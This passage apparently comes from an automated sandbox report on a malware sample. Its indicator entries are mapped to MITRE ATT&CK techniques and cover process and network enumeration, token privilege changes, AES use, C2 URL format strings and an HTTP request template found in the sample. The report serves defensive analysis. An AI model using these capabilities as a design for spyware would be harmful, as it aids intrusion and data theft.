"category": "Spyware/Information Retrieval", "identifier": "string-164", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the fully qualified path of module (API string)", "description": "Found reference to API \"GetModuleFileNameA\" (Indicator: \"GetModuleFileName\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"GetModuleFileNameA\" (Indicator: \"GetModuleFileName\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-317", "type": 2, "relevance": 1, "name": "Contains ability to retrieve address of exported function from a DLL (API string)", "description": "Found reference to API \"GetProcAddress\" (Indicator: \"GetProcAddress\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"GetProcAddress\" (Indicator: \"GetProcAddress\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-131", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the specified system metric or system configuration setting (API string)", "description": "Found reference to API \"GetSystemMetrics\" (Indicator: \"GetSystemMetrics\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"GetSystemMetrics\" (Indicator: \"GetSystemMetrics\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-80", "type": 2, "relevance": 1, "name": "Contains ability to determine disk drive type (API string)", "description": "Found reference to API \"GetDriveTypeA\" (Indicator: \"GetDriveType\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"GetDriveTypeA\" (Indicator: \"GetDriveType\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-121", "type": 2, "relevance": 1, "name": "Contains ability to retrieve usernames and/or user information (API string)", "description": "Found reference to API \"OpenProcessToken\" (Indicator: \"OpenProcessToken\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"OpenProcessToken\" (Indicator: \"OpenProcessToken\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-229", "type": 2, "relevance": 1, "name": "Contains ability to query registry keys (API string)", "description": "Found reference to API \"RegQueryValueExA\" (Indicator: \"RegQueryValue\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"RegOpenKeyExA\" (Indicator: \"RegOpenKey\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"RegOpenKeyExA\" (Indicator: \"RegOpenKey\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API \"RegQueryValueExA\" (Indicator: \"RegQueryValue\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-85", "type": 2, "relevance": 1, "name": "Contains ability to enumerate process and/or its information (API string)", "description": "Found reference to API \"GetCurrentProcess\" (Indicator: \"GetCurrentProcess\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"Thread32First\" (Indicator: \"Thread32First\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"Process32First\" (Indicator: \"Process32First\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"Process32Next\" (Indicator: \"Process32Next\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"CreateToolhelp32Snapshot\" (Indicator: \"CreateToolhelp32Snapshot\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"Thread32Next\" (Indicator: \"Thread32Next\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"GetCurrentProcessId\" (Indicator: \"GetCurrentProcess\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"GetCurrentProcess\" (Indicator: \"GetCurrentProcess\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API \"Thread32First\" (Indicator: \"Thread32First\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API \"Process32First\" (Indicator: \"Process32First\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API \"Process32Next\" (Indicator: \"Process32Next\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API \"CreateToolhelp32Snapshot\" (Indicator: \"CreateToolhelp32Snapshot\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API \"Thread32Next\" (Indicator: \"Thread32Next\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API \"GetCurrentProcessId\" (Indicator: \"GetCurrentProcess\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-427", "type": 2, "relevance": 1, "name": "Contains ability to retrieve a module handle (API string)", "description": "Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-205", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the time elapsed since the system was started (API string)", "description": "Found reference to API \"GetTickCount\" (Indicator: \"GetTickCount\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"GetTickCount\" (Indicator: \"GetTickCount\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-118", "type": 2, "relevance": 1, "name": "Contains ability to query network adapter information (API string)", "description": "Found reference to API \"GetAdaptersInfo\" (Indicator: \"GetAdaptersInfo\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"GetAdaptersInfo\" (Indicator: \"GetAdaptersInfo\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-313", "type": 2, "relevance": 1, "name": "Contains ability to enumerate system network resources (API string)", "description": "Found reference to API \"WNetOpenEnumA\" (Indicator: \"WNetOpenEnum\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"WNetOpenEnumA\" (Indicator: \"WNetOpenEnum\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1135", "attck_id_wiki": "https://attack.mitre.org/techniques/T1135"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-475", "type": 2, "relevance": 1, "name": "Contains string like password/secret", "description": "Found string \"Enter password\" (Indicator: \"password\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found string \"&Enter password for the encrypted file:\" (Indicator: \"password\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found string \"6CRC failed in the encrypted file %s (wrong password ?)\" (Indicator: \"password\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found string \"Wrong password for %s&Write error. Probably the disk is fullRead error\" (Indicator: \"password\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found string \"Enter password\" (Indicator: \"password\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp\")\n Found string \"&Enter password for the encrypted file:\" (Indicator: \"password\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp\")\n Found string \"CRC failed in the encrypted file %s (wrong password ?)\" (Indicator: \"password\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp\")\n Found string \"Wrong password for %s&Write error. Probably the disk is full\" (Indicator: \"password\"; Source: \"00000000-00005280.00000001.138657.00419000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1555", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "static-88", "relevance": 1, "name": "Imports GetCommandLine API", "description": "Observed import api \"GetCommandLineA\" which can \"Retrieves the command-line string for the current process\" [Source: 234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c]", "origin": "Static Parser", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-3", "type": 2, "relevance": 3, "name": "Found potential URL in binary/memory", "description": "Pattern match: \"www.baidu.com\"\n Pattern match: \"www.xunlei.com\"\n Pattern match: \"www.3-0b6f-415d-b5c7-832f0.com\"\n Pattern match: \"http://%s:%d/%s\"\n Pattern match: \"http://%s/%s\"\n Heuristic match: \"z\\.la\"", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-210", "type": 2, "relevance": 1, "name": "Contains ability to create/connect to a named pipe (API string)", "description": "Found reference to API \"CreatePipe\" (Indicator: \"CreatePipe\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"ConnectNamedPipe\" (Indicator: \"ConnectNamedPipe\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"CreateNamedPipeA\" (Indicator: \"CreateNamedPipe\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"CreatePipe\" (Indicator: \"CreatePipe\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API \"ConnectNamedPipe\" (Indicator: \"ConnectNamedPipe\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API \"CreateNamedPipeA\" (Indicator: \"CreateNamedPipe\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-539", "type": 2, "relevance": 1, "name": "Contains reference to Windows internet services (API string)", "description": "Found reference to API \"InternetOpenA\" (Indicator: \"InternetOpen\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"InternetOpenUrlA\" (Indicator: \"InternetOpen\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"InternetOpenA\" (Indicator: \"InternetOpen\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API \"InternetOpenUrlA\" (Indicator: \"InternetOpen\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-14", "type": 2, "name": "Found potential IP address in binary/memory", "description": "Potential IP \"<IPv4>\" found in string \"<IPv4> localhost\"", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-113", "type": 2, "relevance": 1, "name": "Contains ability to provide information and utilities for managing network resources (API string)", "description": "Found reference to API \"WNetCancelConnection2A\" (Indicator: \"WNetCancelConnection\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")", "origin": "File/Memory", "attck_id": "T1135", "attck_id_wiki": "https://attack.mitre.org/techniques/T1135"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-257", "type": 2, "relevance": 1, "name": "Contains ability to enumerate network resources (API string)", "description": "Found reference to API \"WNetAddConnection2A\" (Indicator: \"NetAddConnection\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"WNetCloseEnum\" (Indicator: \"NetCloseEnum\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"WNetAddConnection2A\" (Indicator: \"NetAddConnection\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API \"WNetCloseEnum\" (Indicator: \"NetCloseEnum\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1049", "attck_id_wiki": "https://attack.mitre.org/techniques/T1049"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "memorydump-2", "type": 20, "relevance": 1, "name": "Found potential URLs in memory dumps", "description": "Found URL \"http://%s:%d/%swinsta0defaultexplorer.exe%s%d.exewinsta0\\defa%s%d.nlscryptcom.dlldlft_shutdowndlft_startupdlft_settrackerreportcallbackc_30218.nls%x-%x-%x-%x-%x-%xget\" - Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp\")\n Found URL \"http://%s/%s\\\\%s\\pipe%s\\browser%s\\ping.exe\" - Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp\")\n Found URL \"http://%s:%d/%swinsta0defaultexplorer.exe%s%d.exewinsta0\\defa%s%d.nlscryptcom.dlldlft_shutdowndlft_startupdlft_settrackerreportcallbackc_30218.nls%x-%x-%x-%x-%x-%xget\" - Source: \"00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found URL \"http://%s/%s\\\\%s\\pipe%s\\browser%s\\ping.exe\" - Source: \"00000000-00005280.00000001.138657.00424000.00000080.mdmp\")", "origin": "Memory Dumps", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-601", "type": 2, "relevance": 1, "name": "Contains ability to communicate with network (API string)", "description": "Found reference to API \"InternetOpenA\" (Indicator: \"InternetOpen\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"InternetOpenUrlA\" (Indicator: \"InternetOpen\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"HttpQueryInfoA\" (Indicator: \"HttpQueryInfo\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"InternetReadFileExA\" (Indicator: \"InternetReadFile\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"InternetOpenA\" (Indicator: \"InternetOpen\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API \"InternetOpenUrlA\" (Indicator: \"InternetOpen\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API \"HttpQueryInfoA\" (Indicator: \"HttpQueryInfo\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API \"InternetReadFileExA\" (Indicator: \"InternetReadFile\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-241", "type": 2, "relevance": 1, "name": "Contains ability to download a file from a URL (API string)", "description": "Found reference to API \"InternetReadFileExA\" (Indicator: \"InternetReadFile\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"InternetReadFileExA\" (Indicator: \"InternetReadFile\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-457", "type": 2, "relevance": 1, "name": "Found string related to HTTP headers", "description": "Found string \"GET %s?%s HTTP/1.1Connection: Keep-AliveHost: %sUser-Agent: Mozilla/4.0Accept-language: cn\" (Indicator: \"HTTP/1.1\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found string \"GET %s?%s HTTP/1.1\" (Indicator: \"HTTP/1.1\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "summary-32", "type": 15, "relevance": 1, "name": "Shows ability to deobfuscate/decode files or information", "description": "The analysis shows use of encryption and can be used to decode file or information. Matched sigs: YARA signature match - AES encryption", "origin": "Indicator Combinations", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "summary-28", "type": 15, "relevance": 1, "name": "Shows ability to obfuscate file or information", "description": "The analysis contains indicators for cyrpto or data obfuscation(base64/decrypt) which can hide information. Matched sigs: Contains CRYPTO related strings\n Matched sigs: YARA signature match - AES encryption", "origin": "Indicator Combinations", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "summary-31", "type": 15, "relevance": 1, "name": "Shows ability to use encryption for command and control traffic", "description": "The analysis shows use of encryption\n use of http/https that can be used to send encrypted data on command and control server. Matched sigs: YARA signature match - AES encryption\n Matched sigs: Found potential URL in binary/memory\n Matched sigs: Found potential IP address in binary/memory\n Matched sigs: Found potential URLs in memory dumps\n Matched sigs: Contains ability to communicate with network (API string)", "origin": "Indicator Combinations", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-114", "type": 2, "relevance": 1, "name": "Contains ability to obtains specified information about the security of a file or directory (API string)", "description": "Found reference to API \"SetFileSecurityW\" (Indicator: \"SetFileSecurityW\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"SetFileSecurityW\" (Indicator: \"SetFileSecurityW\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-426", "type": 2, "relevance": 1, "name": "Contains ability to modify file attributes (API string)", "description": "Found reference to API \"SetFileAttributesA\" (Indicator: \"SetFileAttributes\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"SetFileAttributesW\" (Indicator: \"SetFileAttributes\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"SetFileAttributesA\" (Indicator: \"SetFileAttributes\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API \"SetFileAttributesW\" (Indicator: \"SetFileAttributes\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-474", "type": 2, "relevance": 1, "name": "Contains ability to access device drivers", "description": "Found string \"%s\\drivers\\etc\\hosts\" (Indicator: \"\\drivers\\\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found string \":\\Windows\\System32\\DriverStore\" (Indicator: \"system32\\drivers\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00640000.00000004.mdmp\")\n Found string \":\\Windows\\System32\\DriverStore\\infpub.dat\" (Indicator: \"system32\\drivers\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00640000.00000004.mdmp\")\n Found string \":\\Windows\\System32\\DriverStore\\infstor.dat\" (Indicator: \"system32\\drivers\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00640000.00000004.mdmp\")\n Found string \":\\Windows\\System32\\DriverStore\\infstrng.dat\" (Indicator: \"system32\\drivers\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00640000.00000004.mdmp\")\n Found string \":\\Windows\\System32\\DriverStore\\drvindex.dat\" (Indicator: \"system32\\drivers\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00640000.00000004.mdmp\")\n Found string \":\\Windows\\System32\\DriverStore\\FileRepository\" (Indicator: \"system32\\drivers\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp\")\n Found string \"%s\\drivers\\etc\\hosts\" (Indicator: \"\\drivers\\\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found string \"indows\\System32\\DriverStore\\FileRepository\" (Indicator: \"system32\\drivers\"; Source: \"00000000-00005280.00000001.138657.00640000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-168", "type": 2, "relevance": 1, "name": "Contains ability to create process with token (API string)", "description": "Found reference to API \"CreateProcessAsUserA\" (Indicator: \"CreateProcessAsUser\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"CreateProcessAsUserA\" (Indicator: \"CreateProcessAsUser\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1134.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/002"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-77", "type": 2, "relevance": 1, "name": "Contains ability to modify access token privileges (API string)", "description": "Found reference to API \"LookupPrivilegeValueA\" (Indicator: \"LookupPrivilegeValue\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"AdjustTokenPrivileges\" (Indicator: \"AdjustTokenPrivileges\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"AdjustTokenPrivileges\" (Indicator: \"AdjustTokenPrivileges\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API \"LookupPrivilegeValueA\" (Indicator: \"LookupPrivilegeValue\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-308", "type": 2, "relevance": 1, "name": "Contains ability to delete files/directories (API string)", "description": "Found reference to API \"DeleteFileA\" (Indicator: \"DeleteFile\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"DeleteFileW\" (Indicator: \"DeleteFile\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"RemoveDirectoryA\" (Indicator: \"RemoveDirectory\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"DeleteFileA\" (Indicator: \"DeleteFile\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API \"DeleteFileW\" (Indicator: \"DeleteFile\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 